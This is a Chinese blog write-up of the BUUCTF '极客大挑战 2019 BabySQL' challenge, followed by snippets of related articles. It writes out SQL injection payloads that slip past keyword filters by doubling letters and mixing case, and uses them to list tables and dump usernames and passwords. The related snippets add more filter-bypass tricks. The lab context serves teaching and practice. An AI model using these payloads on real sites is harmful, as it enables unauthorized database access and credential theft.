[极客大挑战 2019]BabySQL

已于 2022-09-20 10:55:22 修改
阅读量784 收藏
点赞数 3
分类专栏: buuctf 文章标签: web安全 安全
于 2022-01-10 19:34:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pakho_C/article/details/122416341
版权

web
第七题

[极客大挑战 2019]BabySQL

打开靶场
在这里插入图片描述
根据提示,作者很可能对输入进行了过滤
仍旧先尝试永真式进行登陆

在这里插入图片描述
在这里插入图片描述
根据报错提示,or应该是被过滤掉了
那么就要想到绕过过滤的方法
参考:SQL注入 绕过and和or过滤

这里可以使用双写加大小写OorR或者使用 || 进行绕过
在这里插入图片描述在这里插入图片描述
得到admin账号和密码,与我做的第五题web第五题一样,密码解密不出来,没什么用

既然有报错,那么肯定存在sql注入,尝试常规的注入手段
猜解字段数
在这里插入图片描述
在这里插入图片描述
看来or 和by 都被过滤了
参考了一下大佬的文章:SQL注入一些过滤及绕过总结
首先尝试使用注释进行绕过
在这里插入图片描述
在这里插入图片描述
看来*也被过滤了,但是可以发现by还在,那么双写应该可以通过

尝试双写加大小写绕过
在这里插入图片描述
在这里插入图片描述
看来已经绕过了,但是字段数不是4
尝试3
在这里插入图片描述
没有报错,那么字段数为3
接下来就要使用联合查询

1' union select 1,2,3 #

在这里插入图片描述
显然,union和select也被过滤掉
由上面可知,*被过滤了,那么注释绕过行不通,还是尝试双关键字加大小写进行尝试

1' UnunionIoN SeSeLectLeCt 1,2,3 #

在这里插入图片描述
成功!
回显字段为2,3

查询数据库中的表名,注意查询语句中的or也要进行绕过,尝试

1' UnunionIoN SesEleCtlEcT 1,2,group_concat(table_name) from infOorrmation_schema.tables where table_schema=database() #

在这里插入图片描述
看来information_schema前面的某个东西和where也被过滤了,猜测是from被过滤,进行绕过尝试

1' UnunionIoN SesEleCtlEcT 1,2,group_concat(table_name) frofromm infoOrrmation_schema.tables wherwheree table_schema=database() #

在这里插入图片描述
猜测成功,得到数据库有2张表,根据上面拿到的用户名和密码,猜测登陆页面的查询来自geekeruser,猜测flag在b4bsql表中
对b4bsql表进行查询

1' UnunionIoN SesEleCtlEcT 1,2,group_concat(column_name) frofromm infoORrmation_schema.columns whwhereere table_name='b4bsql' #

在这里插入图片描述
额。。和我做的第五题好像 第五题

直接查询表中信息

1' UnunionIoN SesEleCtlEcT 1,username,passwoORrd frofromm b4bsql whwhereere id=1 #

在这里插入图片描述
id=2
在这里插入图片描述
id=3
在这里插入图片描述

id=8
在这里插入图片描述

pakho_C
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
sql注入中过滤关键字(union select等等)
没事我溜达
03-15 8307
今天来学习一下注入中关键字被过滤了该如何解决 打开靶场,这是我本地搭建的一个靶场所以没有靶场地址 我们在输入框内输入一个1 查询一下结果。 尝试闭合和注释,发现单引号即可完成闭合,--+作为注释内容,通过order by查询列数 看到页面上方order的or被过滤,说明or即是关键词,我们双写or,变成 oorrder by 2 (一定要在or的中间双写or,不然两个都会被注释掉) 通过order by发现只有两列数据,那么开始联合注入 ...
mysql in sql注入_过滤in,or字符的sql注入学习
weixin_32199821的博客
01-27 808
在sql注入中,有时候会遇见一些过滤,将in或者or之类的匹配出来,这样传统的通过information_schema是得不出来列名的。这里引入一个sys的一个表可以看到这里有很多表名。这里有很多$符号的表名,这些表单里面就存在很多信息。这里就出现了我创建的一个表。这里还可以用selecttable_namefromsys.x$schema_table_statisticswhereta...
SQL注入 绕过and和or过滤
m_de_g的博客
12-09 3337
SQL注入 绕过and和or过滤 1.基础知识介绍 1.MySQL中的大小写不敏感,大写与小写一样。 2.MySQL中的十六进制与URL编码 3.符号和关键字替换and – &&、or–|| 4.内联注释与多行注释 /*! 内联注释*/ /*多行注释*/ 2.去除and和or的代码分析 3.绕过去除and和or的SQL注入 1.大小写变形,Or,OR,oR,OR,And,ANd,aND等 代码中大小写不敏感都被剔除 2.在这两个敏感词汇中添加注释,例如:a/**/nd 双写绕过 oorr
SQL注入绕过select过滤
qq_43596950的博客
03-25 4389
原题目出自攻防世界收录的2019强网杯,官网已有writer up,此博文仅个人的做题笔记 原题目链接:adworld.xctf.org.cn select被过滤可以考虑使用show显示表名和列名 http://ip:port/?inject= ';show databases;show tables;show columns from table; alter更改表名,利用源代码中的select进行查询 alter语句: ALTER TABLE 表名 CHANGE COLUMN 列名 【新】列名
绕过UNION&SELECT过滤
ChuMeng1999的博客
10-30 418
打开桌面上的火狐浏览器,选择『绕过UNION&SELECT过滤』下面的『GET-基于错误-过滤UNION&SELECT-字符型-单引号和圆括号』。打开桌面上的火狐浏览器,选择『绕过UNION&SELECT过滤』下面的『GET-基于错误-过滤UNION&SELECT-字符型-单引号』。打开桌面上的火狐浏览器,选择『绕过UNION&SELECT过滤』下面的『GET-基于错误-过滤UNION&SELECT-双引号』。很多不可见的空白字符都可以用哦,你可以试试。针对于过滤,我们要善用编码,来绕过关键字过滤
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
最新发布
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
python极客项目编程pdf
03-31
python极客项目编程书籍,很好的一本深入学习python的书籍
带输入框的下拉列表 select 输入框 过滤
07-12
带输入框的下拉列表 select 输入框 过滤
SQL注入详解(下)
weixin_59571952的博客
12-05 1221
五:常见的waf绕过方式以及实战 1:编码 采用url 十六进制等编码方式进行waf绕过 2:大小写绕过 在尝试的时候可以修改语句中字母的大小写,如果WAF使用是区分大小写的黑名单,那么就可以使用大小写进行绕过 3:过滤符号绕过 waf中可能会过滤掉一些特殊符号 我们可以利用他们过滤的特殊符号来进行绕过 比如 select被拦截了 <>被过滤了 那么我们可以把select写成sel<>ect来进行绕过waf 或者使用双写seselectlect 来进行绕过 4:使用.
SQL检索、过滤数据(一)
cuicui_ruirui的博客
05-27 597
1.1 select检索数据 1. select 列名 from 表名; 2. select 列名1,列名2,列名3 from 表名; 3. select * from 表名; 警告:使用通配符 一般而言,除非你确实需要表中的每一列,否则最好别使用*通配符。虽然使用通配符能让你自己省事,不用明确列出所需列,但检索不需 要的列通常会降低检索和应用程序的性能。 提示:检索未知列 使用通配符有一个大优点。由于不明确指定列名(因为星号检索每一列),所以能检索出名字未知的列。 提示:SQL...
bugku学习之43.sql注入2(只剩下from没过滤其余的全部过滤
s11show_163的博客
03-05 285
考察: 逗号被过滤:substr(from for)或者mid(from for)截断 for被过滤:不使用for则mid(from)默认截断到字符串位 空格被过滤:不使用空格 admin字符串与另一个字符串比较时会被翻译成0或者空格 所以’admin’-’‘的意思是减去空字符串,所以值为0,更深远的’admin’-0-’‘先减去0再减去空字符串,值也为0,而’admin’-1-’'的值则为1。...
sql注入绕过
qq_43613772的博客
03-19 402
1、大小写绕过 改变语句中单词的大小写即可,如:select=>SelEct 2、双写绕过 如下: ununionion seselectlect 3、内联注释绕过 内联注释就是把一些特有的仅在MYSQL上的语句放在 /!../ 中,这样这些语句如果在其它数据库中是不会被执行,但在MYSQL中会执行。 select * from users where id = -1 union /*!...
buuctf-BabySQL
m0_62094846的博客
11-11 333
可以看到or不见了,再联系网页中所说进行过滤,可能是过滤掉了一些注入语句的关键词,但是到底过滤了哪些是个问题 过滤掉了or 和by 用oorrder bbyy,就可以在系统过滤后得到order by 有3段数据 接下来查数据库 系统又过滤了union select from被过滤了,注意information的or也是被过滤的 接下来查表,先试试ctf where也被过滤了 后面查不出结果,到时候再试试 看wp,把字段放在密码后面 ...
SQL Injection绕过技巧
weixin_34261739的博客
08-15 1111
0x00 sql注入的原因 sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量。 但是更深层次的原因是,将用户输入的字符串,当成了 “sql语句” 来执行。 比如上面的 String sql = "select id,no from user where id=" + id; 我们希望用户输入的 id 的值,仅仅作为一个字符串字面值,传入数据库执行,...
sql注入用<>绕过被过滤的select ——百度杯9月第二场SQL
热门推荐
ancan8807的博客
09-17 1万+
题目提示SQL注入,打开源代码发现<!--SELECT * FROM info WHERE id=1--> 尝试union select 1,2,3提示inj code! 经过多次尝试之后发现select已经被过滤,于是百度绕过select过滤的方法,/*!%53eLEct*/,发现依旧无法绕过select过滤 经过再次尝试后发现可以用<>进行绕过,于是构造...
sql注入原理
嘻嘻哈哈
02-23 2848
0x01sql注入原理 sql注入漏洞产生的原理是因为服务器对用户输入参数过滤不严格,将含有恶意代码的参数代入数据库查询语句中并执行。 0x02sql注入中常用的函数与语法 Group_concat():将select的查询结果全部显示出来,占一个显示位 select version():查询MySQL版本 select user():查询数据库用户名 select databas...
[极客挑战 2019]babysql
03-16
"极客挑战 2019" 的 "babysql" 是一道 SQL 注入漏洞题目。题目要求通过提交带有恶意代码的 SQL 查询,绕过网站的验证机制并获取敏感信息。解决这道题目的关键在于对 SQL 注入的理解和利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值